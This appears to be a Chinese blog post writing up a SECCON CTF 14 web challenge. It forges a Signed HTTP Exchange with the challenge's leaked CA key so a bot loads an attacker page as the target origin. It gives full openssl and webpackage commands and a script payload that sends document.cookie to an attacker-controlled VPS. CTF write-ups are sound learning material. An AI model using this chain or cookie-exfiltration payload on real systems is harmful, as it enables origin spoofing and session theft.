SECCON CTF 14 Quals

发表于 2025-12-15 更新于 2025-12- 14

作者 ENOCH

7~9 分钟 阅读

期末周，还是做了一题就润了

broken-challenge

cookie 在 hack.the.planet.seccon 这个域

/hint 路由给了证书私钥

使用SXG，让 bot 访问我们控制的 URL，但浏览器却判定当前页面的 Origin 是 https://hack.the.planet.seccon

先将题目给的key和crt保存为ca.key和ca.crt，然后执行

#!/bin/bash

# 准备 OpenSSL 扩展配置文件
cat <<EOF > sxg_ext.cnf
basicConstraints = CA:FALSE
keyUsage = digitalSignature
subjectAltName = DNS:hack.the.planet.seccon
1.3.6.1.4.1.11129.2.1.22 = ASN1:NULL
EOF

# 生成 CSR
openssl req -new -newkey ec:<(openssl ecparam -name prime256v1) -nodes \\
    -keyout leaf.key -out leaf.csr \\
    -subj "/CN=hack.the.planet.seccon/O=Seccon/C=JP"

# 使用题目提供的 CA 签发证书
openssl x509 -req -days 90 -in leaf.csr \\
    -CA ca.crt -CAkey ca.key -CAcreateserial \\
    -out leaf.crt -extfile sxg_ext.cnf

# 生成 OCSP 响应
openssl ocsp -index <(printf "V\\t350101000000Z\\t\\t%s\\tunknown\\t/CN=hack.the.planet.seccon\\n" "$(openssl x509 -in leaf.crt -serial -noout | cut -d= -f2)") \\
    -port 8888 -rsigner ca.crt -rkey ca.key -CA ca.crt -text &
OCSP_PID=$!
sleep 1

# 获取 OCSP 响应 DER
openssl ocsp -issuer ca.crt -cert leaf.crt \\
    -url <http://localhost:8888> -respout ocsp.der -noverify

kill $OCSP_PID

使用 Google 官方的 webpackage 工具集生成sxg

go install github.com/WICG/webpackage/go/signedexchange/cmd/...@latest
gen-certurl -pem leaf.crt -ocsp ocsp.der > cert.cbor

echo '<script>location.href="https://<vps_domain>/?flag="+document.cookie</script>' > index.html

gen-signedexchange \\
  -uri <https://hack.the.planet.seccon/> \\
  -content index.html \\
  -certificate leaf.crt \\
  -privateKey leaf.key \\
  -certUrl https://<vps_domain>/cert.cbor \\
  -validityUrl <https://hack.the.planet.seccon/resource.validity.1511128384> \\
  -expire 168h \\
  -o exploit.sxg

将sxg和cbor托管到服务器，注意处理Content-Type即可

sxg：application/signed-exchange;v=b3
cbor：application/cert-chain+cbor

SECCON{congratz_you_hacked_the_planet_521ce0597cdcd1e3}

许可协议: CC BY 4.0